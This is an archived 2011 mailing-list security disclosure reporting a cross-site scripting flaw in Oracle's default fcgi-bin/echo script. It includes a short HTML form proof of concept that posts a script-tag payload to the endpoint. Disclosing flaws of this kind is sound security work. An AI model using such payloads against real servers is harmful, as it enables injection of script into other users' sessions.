lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <201103230059.p2N0xBKL022422@bari.maths.usyd.edu.au>
Date: Wed, 23 Mar 2011 11:59:11 +1100
From: paul.szabo@...ney.edu.au
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: XSS in Oracle default fcgi-bin/echo

Long ago, I wrote about an XSS vulnerability in Oracle fcgi-bin/echo :
  http://lists.grok.org.uk/pipermail/full-disclosure/2010-October/076794.html
  http://www.securityfocus.com/archive/1/514181
The issue may now be fixed in the latest versions of Oracle web servers:
  http://www.integrigy.com/oracle-security-blog/archive/2010/10/10/fastcgi-fcgi-bin-echo
So I now release the PoC for this vulnerability:

  <form action="http://server/fcgi-bin/echo" method=post enctype="multipart/form-data">
  <input type=text name=xss size=50 value="<script>alert('XSS')</script>"><br>
  <input type=submit value="send">
  </form>

The "traditional" form of a similar vulnerability
  http://osvdb.org/700
is claimed to have been fixed long ago, maybe in 
  http://www.oracle.com/technetwork/topics/security/cpujan2007-101493.html
However that never was actually fixed by Oracle, but was fixed by
browsers that %-encode the query.

Another interesting reference:
  http://www.thisisahmed.com/tia/ohs/ohshardening.html

Cheers,

Paul Szabo   psz@...hs.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ